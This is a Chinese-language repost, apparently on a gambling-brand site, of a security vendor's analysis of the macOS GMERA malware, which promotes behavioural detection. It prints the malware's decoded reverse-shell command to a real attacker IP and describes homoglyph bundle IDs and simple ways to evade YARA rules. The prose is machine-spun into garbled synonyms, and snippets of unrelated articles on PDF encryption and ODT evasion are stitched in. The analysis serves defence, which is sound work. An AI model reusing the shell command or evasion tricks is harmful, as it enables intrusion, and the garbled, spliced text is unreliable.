以macOS.GMERA歹意软件为例,揭秘macOS环境下行动检测的道理及上风 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

以macOS.GMERA歹意软件为例,揭秘macOS环境下行动检测的道理及上风

申博_安全工具 申博 32次浏览 未收录 0个评论

如何攻破PDF加密

为了确保机密性,PDF文件是加密的。通过加密可以在没有其他保护机制的情况下,实现敏感文件的安全传输和存储。 发送者和接收者之间的密钥管理是基于口令或公钥的。如果是基于口令的,那么接收者必须知道发送者所使用的口令,或者口令必须通过安全通道来进行传输。如果是基于公钥的,那么发送者必须知道接收者的X.509证书。 安全问题 研究人员分析发现的pdf安全问题包括: 在没有对应口令的情况下,攻击者可以处理加密的pdf文件。PDF规范说明中允许明文和密文混合使

概述

上周,Trend Micro的研讨人员在野外发明了一个新型的macOS歹意软件,该歹意软件会对真正的股票交易运用顺序举行诳骗,开启后门,并运转歹意代码。在本文中,我们重要剖析该歹意软件的事情道理,并以这一歹意软件为示例,议论差别的检测和相应战略,迥殊重点申明在macOS上举行行动检测的道理和上风。

GMERA歹意软件概述

起首,让我们看一下这个新型macOS歹意软件的手艺细节。

研讨人员最初发明了两个变种,并将其辨认为GMERA.A和GMERA.B。在本文中,我们将重点引见GMERA.B样本中与检测和相应有关的关键环节。

我们所剖析的样本哈希值是:d2eaeca25dd996e4f34984a0acdc4c2a1dfa3bacf2594802ad20150d52d23d68。

只管这一哈希值已上传至VirusTotal长达9天,而且TrendMicro在5天前就宣布了相干研讨的消息,但停止现在,该样本依然未被VirusTotal网站上的信用引擎检测为病毒。

与GMERA.A变种一致,该歹意软件包含在名为“Stockfoli.app”的macOS运用顺序bundle中。其名称是一个名为“Stockfolio.app”的正当运用的缩写,该歹意软件声称是正当运用的副本,而且安排在歹意的Stockfoli.app的“Resources”文件夹中。

Resources文件夹中的Stockfolio.app似乎是正当运用顺序的非正式宣布版本,但事实上,歹意软件作者已运用他们编写的代码替换了原始开发人员的代码署名。在本文的下一章中,我们将重点剖析代码署名。

在Resources文件夹中,最值得关注的就是歹意的run.sh剧本。

我们可以看到,在这个歹意软件示例中,剧本包含一些经由简朴Base64编码后的内容,而且在解码后,该剧本会将内容作为隐蔽的属性列表文件,写入~/Library/LaunchAgents文件夹中,其文件名是.com.apple.upd.plist。

在对Base64举行解码时,我们看到安排的属性列表文件自身包含更多Base64编码后的内容,位于其Program Arguments中。

我们对其举行了进一步的解码,得到了一个bash剧本,该剧本翻开一个衔接进击者C2的反向Shell。

while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25733 0>&1'; done

代码休眠10000秒,然后退出并停止前面竖立的任何衔接。然后,运用屏幕实用顺序以“星散”形式启动新的会话。假如衔接在任何时刻断开,从本质上讲,这将致使进击者可以恢复雷同的会话。随后,该剧本挪用Bash的交互形式,经由历程端口25733和上方显现的URL将会话重定向到进击者的装备。Trend Micro的研讨人员发明,在端口25733-25736上运用了反向Shell。我们针对该样本的重要二进制文件举行了逆向,结果表明还可以运用25737和25738这两个端口,个中后者没有运用bash,而是挑选了zsh作为Shell。

在继承探讨检测与相应之前,我们先关注一下此前研讨中未申明的歹意软件的别的一个特性。在歹意Stockfoli.app的Info plist中,最少包含两个差别的bundle标识符(我们确信还会有更多)。它们分别是:

com.appIe.stockf.stocks

com.appIe.stockfolioses.Stockfoli

一眼看上去,就像是“com.apple”,但经由仔细搜检(或修正其显现字体),发明“appIe”中的第4个字母现实上是大写的“I”。

com.appIe.stockf.stocks

com.appIe.stockfolioses.Stockfoli

我们将在背面议论采用这类疑惑体式格局的缘由。

打消证书后就十拿九稳吗?

接下来,我们转向检测和相应。针对没有布置平安解决方案的Mac用户,人人可以很愉快听到,现在这些歹意样本已没法在计算机中运转。其缘由在于,Apple在发明后已打消了针对这些样本举行署名的代码署名。

只管我们很欣喜地看到Apple争先打消了已知歹意软件的署名,但这并非最为充足的防护体式格局。在近来一次研讨历程当中,一名macOS爱好者跟我说,Apple的行为向他证明了,Mac足以抵抗歹意软件。针对如许的看法,我有着更加郑重的回应:这类歹意软件在被发明并被打消署名前已存在了多长时间?有若干用户在歹意软件被公然表露前已被感染?现在仍有若干未知的、经由有用署名的歹意软件样本?

不会经由太久,要挟行动者就会将歹意软件从新打包到一个具有新的署名的bundle中,此时的“游击战”又再次打响:进击者建立并分发具有有用代码署名的歹意运用顺序–>在野外经由一段时间后歹意软件被发明,Apple打消该署名–>进击者运用新的署名从新打包歹意软件,从新开始悉数历程。

如许来讲,假如仅仅依托这类机制来庇护计算机平安,一天、一个小时以至是一分钟的时间差都有可以发生风险。现实上,这类机制自身就须要有人成为受害者,以便可以起首发明样本并打消署名。那末假如我们不幸成为了初期的受害者之一,就会形成一系列丧失。

关于进击者来讲,要猎取有用的代码署名身份每每非常轻易。假如歹意软件自身有利可图,那末进击者会非常愿意付出99美圆的定阅费(Apple开发人员),并与Apple打上一场游击战。而且,假如进击者运用被盗的信用卡或其他付款体式格局举行付出,以至他们都不须要花上这笔钱。

关于歹意软件来讲,要运用新证书将新的运用顺序bundle中的雷同歹意剧本从新打包,是一项非常轻松的自动化使命。我们看到的商品广告软件和PUP播放器,险些天天都在运用如许的手艺。

那末,YARA划定规矩呢?

现实上,Apple不仅可以打消已发明的歹意软件的证书,另有一些其他机制。正如在近来的WWDC 2019上,Apple一直在议论“纵深防备”。详细而言,Apple具有一套内置的东西,比方Gatekeeper、XProtect和MRT,以协助阻挠已知歹意软件和举行弥补。跟着Catalina版本行将推出,Apple还设计在其武器库中增添强制性公证机制。

这些东西依靠于差别战略的组合,从扩大文件属性、硬编码文件途径及哈希值,到指定二进制文件指定特性的Yara划定规矩。只管哈希值和文件途径一般仅针关于单个歹意软件变种,但Yara划定规矩可以用于辨认具有类似特性的歹意软件家属。以XProtect为例,我们可以鄙人面的位置找到:

/System/Library/CoreServices/XProtect.bundle/Contents/Resources/XProtect.yara

三起应用ODT文件花样绕过杀毒引擎的进击案例剖析

近期,思科Talos观察到利用Office应用程序的开放文档格式(OpenDocument,ODT)来绕过防病毒引擎的攻击行为。ODT是一个ZIP存档,其中包含Microsoft Office等软件使用的基于XML的文件。 杀毒引擎往往将ODT文件视为标准归档文件,并且没有应用与Office文档相同的规则,另外还有一些沙箱也无法分析ODT文档,因为它被认为是归档文件,并且沙箱不会以Microsoft Office文件的形式打开它,因此攻击者可以使用ODT文件来传递通常会被传统杀毒软件阻止的恶意软件。 我们只找到

这个Yara划定规矩指定了五组字符串,假如它们悉数涌现在文件大小小于200KB的Mach-O可实行文件中,那末XProtect会将其视为歹意软件家属MACOS.6175e25的成员,并阻挠其运转。

接下来,我们转换这些十六进制字符串,以相识它们的现实寄义:

须要明白的是,该划定规矩与本文所议论的GMERA歹意软件无关。在撰写本文时,XProtect和MRT.app均还没有举行更新以检测GMERA歹意软件。我们在本章的重点在于展现Yara在通例事情中的划定规矩。上面显现的划定规矩现实上是针对之前已逆向的某些歹意软件。从歹意软件作者的角度来看,他们很轻易相识XProtect的发展趋势,并借助这些学问来有针对性地举行匹敌。

关于进击者来讲,匹敌的难度也不是很大,事情量比Apple所做的要少许多。关于歹意软件作者来讲,要防止被上述Yara划定规矩检出,可以运用的一个简朴技能就是重命名要领(要回避上述划定规矩,只须要修改一个字母即可),或许运用类似于Base64如许的编码体式格局举行屡次编码。现实上,有许多种要领可以举行纤细的调解,从而损坏Yara的划定规矩。同时,Apple(以及依靠雷同手艺的第三方平安厂商)必需比及这些变化涌现后,才能对样本举行测试,并更新修正后的署名。长期以来,要挟行动者都在延续做出革新,而Apple和其他厂商不能不延续追逐,由于他们非常清晰,他们的更新署名将会在数小时内被弃用。

这场没法打赢的游击战有一个关键环节,就像是打消证书一样,文件途径、哈希值和Yara划定规矩都有一个致命的缺点——它们依靠于先前发明的样本。一样,这关于初期感染新型要挟的用户来讲,无疑在某种程度上来讲是不公平的。

经由历程检测可疑行动击败macOS歹意软件

荣幸的是,另有另一种不依靠先验学问的要领,可以检测并阻挠歹意软件。一般来讲,歹意软件和要挟参与者的目标是有限的,而且是详细的。只管完成细节可以千差万别,但完成这些目标所需的现实行动是有限的和可定义的。假如我们运用行动检测引擎,就会让完成细节变成完全不相干的要素。

在当代科学社会,我们已不再经由历程检察大脑的衔接体式格局,或许丈量头骨的外形大小来发明犯罪分子,而是经由历程评价他们违背法律法规的可以性来举行评价。针对未知软件、剧本和历程,现实上我们也可以这么做。

不管其内部衔接怎样,歹意软件(类比于犯罪分子)一定会举行某些不良行动。经由历程在历程生命周期中跟踪各个事宜并对其举行情境化,我们就可以将图片或“故事”组合成以下内容:

“整体来讲,这些事宜构成了不良行动,我们应当对其举行正告或阻挠。”

假如不再依靠于诸如字符串、哈希值和途径之类的静态特性,而是专注于动态行动,那末纵然之前我们没有发明过特定的完成,也可以辨认歹意软件。

上述也恰是当前行动和AI引擎背地的基本道理,只管我们没法深切相识一些行动检测产物时怎样完成这一历程的,但可以借助对GMERA歹意软件的剖析来相识行动检测的道理。

如我们所见,macOS.GMERA歹意软件将一个耐久性代办写入~/Library/LaunchAgents。假如我们在macOS上手动搜刮要挟,那末新写入的LaunchAgent将引发我们的小心,关于自动化相应也是云云。我们还看到,关于GMERA歹意软件,父历程删除了一个耐久性代办,该耐久性代办经由历程在文件名前加上句点(.)来使其在Finder中不可见。

上述行动会让我们加深对其的疑心,这类行动不仅关于正当软件来讲是不寻常的,而且它并没有一个合理的目标。允许历程写入不可见文件的重要缘由,是为了隐蔽用户不会接触到的暂时数据和元数据。只管可以另有其他一些正当的运用场景(比方DRM允许等),但在这里,没有任何理由要让用户在Finder中看不到真正的耐久性代办。

另有一点,这个LaunchAgent的行动自身是非常的。它不是在特定途径上实行文件,而是解码Base64殽杂后的剧本并在内存中实行。只管毫无疑问,我们可以设想这是一种临界的合理状况,但在典范的企业环境中,这类行动险些可以肯定是与诳骗相干。

末了,如上文所述,父运用顺序运用了一个显然是误导的bundle标识符。

这是一种诳骗手腕,指在诳骗未仔细观察的用户,这些用户可以会直接疏忽正当的历程。如许的战略还可以会诳骗一些简朴的平安解决方案,这些平安解决方案每每会搜检带有“com.apple”bundle标识符的历程是不是现实上已运用Apple的署名举行签订。用大写的“I”来替换Apple中的“l”可以奇妙地避开这类启发式要领。

假如要编写检测引擎,可以斟酌同形异义词进击和URL域名诳骗这两个维度,它们是两种经由磨练且值得信任的手艺,但一样非常轻易被普通用户疏忽。然则,文件叫什么不重要,它做了什么才是重中之重。隐蔽的耐久性机制会在内存中翻开反向Shell,而且这个Shell被没有显著功用关联的运用顺序投放。另有什么能比如许的行动更可疑呢?

经由历程行动检测发明GMERA歹意软件

在本篇文章中,我们报告了许多理论状况,但在详细实践中能行得通吗?只管GMERA歹意软件运用顺序bundle自身一旦被撤消证书后将没法运转(除非删除代码署名或运用ad hoc证书从新签订),但依然可以实行歹意的run.sh。剧本捆绑在运用顺序的Resources文件夹中,不会遭到Apple内置平安东西的检测。这意味着,我们依然可以测试该歹意软件的大部分行动。固然,这也同时意味着进击者可以手动实行此操纵,别的一个歹意顺序也可以会发明Stockfoli.app bundle并在随后的感染中应用它。

我们以SentinelOne行动引擎为例,详细看看怎样相应run.sh剧本的实行。一旦实行剧本,就会在Agent端举行检测。

我们可以在治理掌握大驾,看到更多详细信息:

请关注以下MITER ATT&CK TTP:

1. 历程投放一个隐蔽的可疑plist以完成耐久性(T1150);

2. 历程编写了一个隐蔽文件以完成耐久性(T1158);

3. 历程经由历程启行动业(Launchd Job)完成耐久性)T1160。

当我们在测试环境中设置了“检测”战略,而不是“阻挠”战略时,我们可以更好地剖析歹意软件的行动,固然也会允许剧本继承实行。下图列出了历程的构造和完全击杀链(Kill Chain)。

固然,在现实布置中,我们完全可以将战略设置为“阻挠”。出于研讨目标,“仅检测”战略可以用于剖析歹意软件的行动,并猎取有关于进击者TTP的更多信息。

总结

我们对近期发明的GMERA歹意软件举行剖析,在东西、战略和顺序(TTP)方面没有发明任何新变化。进击者应用了一种传统、易于构建的体式格局来举行进击和耐久化,详细包含一个捏造的运用顺序、一个用于耐久化的启动代办和一个简朴地基于bash或zsh的反向Shell,终究致使受害者遭遇破绽应用,发生数据泄漏,以至进一步被进击。但是,包含Apple内置机制在内的浩瀚解决方案都未能在实行前或实行历程当中检测到此类要挟,而是依托发明后的软件更新来为用户供应庇护。

我们引荐的解决方案是行动和AI引擎,可以供应真正的深度防备,是当前保证领先于进击者并庇护Mac用户免受新型要挟进击的唯一要领。歹意软件作者可以更新歹意软件的内容,但只需这些软件继承表现出可疑行动,我们就可以继承将其肃除。

本文翻译自:https://www.sentinelone.com/blog/detecting-macos-gmera-malware-through-behavioral-inspection/


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明以macOS.GMERA歹意软件为例,揭秘macOS环境下行动检测的道理及上风
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址